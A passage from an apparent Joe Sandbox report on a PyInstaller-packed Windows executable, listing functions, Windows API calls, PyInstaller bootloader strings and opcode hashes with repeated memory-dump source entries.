                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMultiStringsWide
                                                                                                                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                                                • API String ID: 2001182103-930877121
                                                                                                                                                                                                                                                                                • Opcode ID: b30a72d36afce0cd8273f42ba79e9994321ef07812378637c8fd6fc8c555bb8b
                                                                                                                                                                                                                                                                                • Instruction ID: 0c9474f9552ae33db3a8857d6fb9b6b4482ccb5577f12f3e367611c8902df4cc
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b30a72d36afce0cd8273f42ba79e9994321ef07812378637c8fd6fc8c555bb8b
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3518811A1D642F1FAF0BB24E8517BAF251EF84780FC48039EA4E626D5EE3CE505A760
                                                                                                                                                                                                                                                                                Function 00007FF733397500 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                                                • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                                                • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                                                • Opcode ID: 44e53fe94581f3919e9549e222624ce8134aca65504236f29db41f4538cf5799
                                                                                                                                                                                                                                                                                • Instruction ID: 59b3c0d8820ed119883325ceea0e339879464999740d7ef9cf6f1fac0ac8c5b7
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44e53fe94581f3919e9549e222624ce8134aca65504236f29db41f4538cf5799
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89219A61B08A42E1E7E57F79A444279B350EF88B90F888134EE1D533D5DE3CD5859330
                                                                                                                                                                                                                                                                                Function 00007FF7333A7250 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 493COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                                                • Opcode ID: 65d4a0ffdc8e7253b8e60b637b85ac8f97459ea152ba9c8238927d2e88e0f15e
                                                                                                                                                                                                                                                                                • Instruction ID: 49bdafe3dda7c423a9eaf80d7dbe8147ba5e45fb92e3abf0c9781e4508e2f61f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65d4a0ffdc8e7253b8e60b637b85ac8f97459ea152ba9c8238927d2e88e0f15e
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D112A262A0C14366FBB47A94D0946B9E655FB40750FC4C13AF6AE66AD4DB3CE480EB20
                                                                                                                                                                                                                                                                                Function 00007FF7333A05A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                                                • Opcode ID: fc8e2330ab6ced16bd3d959f6bc8057a9fc686b659d09149717256120edd57c1
                                                                                                                                                                                                                                                                                • Instruction ID: d266114e5f2f12bd76381a60af1bff965914aa1f7d8a16ea93b39943066d0488
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc8e2330ab6ced16bd3d959f6bc8057a9fc686b659d09149717256120edd57c1
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83129F22A0C143A6FBB06B15D1546FAF691FB50754FC8C03DE6AE666C4DF3DE484AB20
                                                                                                                                                                                                                                                                                Function 00007FF733391030 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                                • Opcode ID: 6029b1735a59e1309af601e5d750f0b91fc035069c103727a7f18ca4da3434e5
                                                                                                                                                                                                                                                                                • Instruction ID: 34360f8626c8bbca8acee6109062f26bdfb926038a54cf2eec90bc2017dc27e5
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6029b1735a59e1309af601e5d750f0b91fc035069c103727a7f18ca4da3434e5
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB417F22E08652B5FAA0FB1198017B9E3A1BF44BC0FC4C43AED5C677A5DE3CE505A750
                                                                                                                                                                                                                                                                                Function 00007FF733391450 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                                • Opcode ID: 088a89800c7e6f5b8d7c94df284b479ca42bc713950b7ae474f5026a04d283ec
                                                                                                                                                                                                                                                                                • Instruction ID: ed35644a69ff5f6d4f9502477fd19db1351f604e2c304e4124078d1eb2d6ef82
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 088a89800c7e6f5b8d7c94df284b479ca42bc713950b7ae474f5026a04d283ec
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E416422E08642A5EAA0FF2194016F5F3A1EF44794FC4C43AED5D77BA5DE3CE501A710
                                                                                                                                                                                                                                                                                Function 00007FF73339DF98 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                                                • Opcode ID: 7d7d5a635fcd63c536a58b816f4712f1a96a9e43b0d550c3d6dd02e630e8922c
                                                                                                                                                                                                                                                                                • Instruction ID: 699ed18adf67ac9a3a34731bb0d083028ac581a014cc6d817312c2ceac22c69e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d7d5a635fcd63c536a58b816f4712f1a96a9e43b0d550c3d6dd02e630e8922c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2D19F32A09741D6EBB0AB65D4817ADB7A0FB44788F808139EE8D677A5CF3CE491D710
                                                                                                                                                                                                                                                                                Function 00007FF733392310 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF733392AC6,?,00007FF733392BC5), ref: 00007FF733392360
                                                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF733392AC6,?,00007FF733392BC5), ref: 00007FF73339241A
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentFormatMessageProcess
                                                                                                                                                                                                                                                                                • String ID: %ls$%ls: $<FormatMessageW failed.>$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                                • API String ID: 27993502-4247535189
                                                                                                                                                                                                                                                                                • Opcode ID: 92e20a795bf73765402ca9ec7783ee5ad9f8f927f89bd5dd19570627e0bc01fb
                                                                                                                                                                                                                                                                                • Instruction ID: 82eefc8548f68028996d500dc375bad434a1f2f839a674204030c7d649ae4d28
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92e20a795bf73765402ca9ec7783ee5ad9f8f927f89bd5dd19570627e0bc01fb
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3131C422B08A41A1E6B0BB25B8107FAF255BF84B94F808139EF4DB3A59DE3CD506D710
                                                                                                                                                                                                                                                                                Function 00007FF73339D258 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF73339D50A,?,?,?,00007FF73339D1FC,?,?,?,00007FF73339CDF9), ref: 00007FF73339D2DD
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF73339D50A,?,?,?,00007FF73339D1FC,?,?,?,00007FF73339CDF9), ref: 00007FF73339D2EB
                                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF73339D50A,?,?,?,00007FF73339D1FC,?,?,?,00007FF73339CDF9), ref: 00007FF73339D315
                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF73339D50A,?,?,?,00007FF73339D1FC,?,?,?,00007FF73339CDF9), ref: 00007FF73339D383
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF73339D50A,?,?,?,00007FF73339D1FC,?,?,?,00007FF73339CDF9), ref: 00007FF73339D38F
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                                • Opcode ID: ec1d8984956c5f4cef63aabdc1ab3d005d502d88db624b4fbd9ceb099b80f4f4
                                                                                                                                                                                                                                                                                • Instruction ID: 15835a763f8c3dd93c037263048265ab058b9a185b9791925eee0d0831429ad4
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec1d8984956c5f4cef63aabdc1ab3d005d502d88db624b4fbd9ceb099b80f4f4
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3831C621B1AA41E1EEB5BB12A441375A394FF48BA1FC9853DDE1D6B380DF3CE4459320
                                                                                                                                                                                                                                                                                Function 00007FF7333957A0 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                                                • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                                                • Opcode ID: bdf35f00908a663c977b541a1155eb73016cf86817925c7fc1db5880fcbaeba1
                                                                                                                                                                                                                                                                                • Instruction ID: 26b6e93d928dc9399f9fb4bb9d908653e957a076c3e5115ea567b670ca4adcdd
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bdf35f00908a663c977b541a1155eb73016cf86817925c7fc1db5880fcbaeba1
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2419F21A1DA86F1FAB4FB20E4042E9A315FF44384FC0813AEA5D67296DF3CE645D760
                                                                                                                                                                                                                                                                                Function 00007FF7333AC050 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                • Opcode ID: 6cd12d297b2340e5ffa7c7392ce0e4cdced9a85fa0896577ca3510b685e0d80d
                                                                                                                                                                                                                                                                                • Instruction ID: d20b029a0f0b43c1cf3bac6e051138475d55a7c5e1895eb767adb5f49e659d41
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cd12d297b2340e5ffa7c7392ce0e4cdced9a85fa0896577ca3510b685e0d80d
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC213A20A0C24262FAF8B7395651179E2424F447A0F94C73CD87E7B6D6DE3CE841B320
                                                                                                                                                                                                                                                                                Function 00007FF7333B8FDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                                                • Opcode ID: 09a7ef29c2f791f79e4b414a588c98caae924e0a86b8d7fe5631f15f3a619b4d
                                                                                                                                                                                                                                                                                • Instruction ID: 60a57edce472817ed1115c075198a494e7991d301d960276d2435c223c282a09
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09a7ef29c2f791f79e4b414a588c98caae924e0a86b8d7fe5631f15f3a619b4d
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB116321B18A4196E7A0AB52F854339B2A4FB88FE4F948238EA5D977A4CF7CD504C750
                                                                                                                                                                                                                                                                                Function 00007FF7333979B0 Relevance: 9.1, APIs: 6, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(FFFFFFFF,?,?,00000000,00007FF733398706), ref: 00007FF7333979E2
                                                                                                                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF733398706), ref: 00007FF733397A39
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733398950: MultiByteToWideChar.KERNEL32(?,?,?,00007FF733393A04,00000000,00007FF733391965), ref: 00007FF733398989
                                                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF733398706), ref: 00007FF733397AC8
                                                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF733398706), ref: 00007FF733397B34
                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF733398706), ref: 00007FF733397B45
                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF733398706), ref: 00007FF733397B5A
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
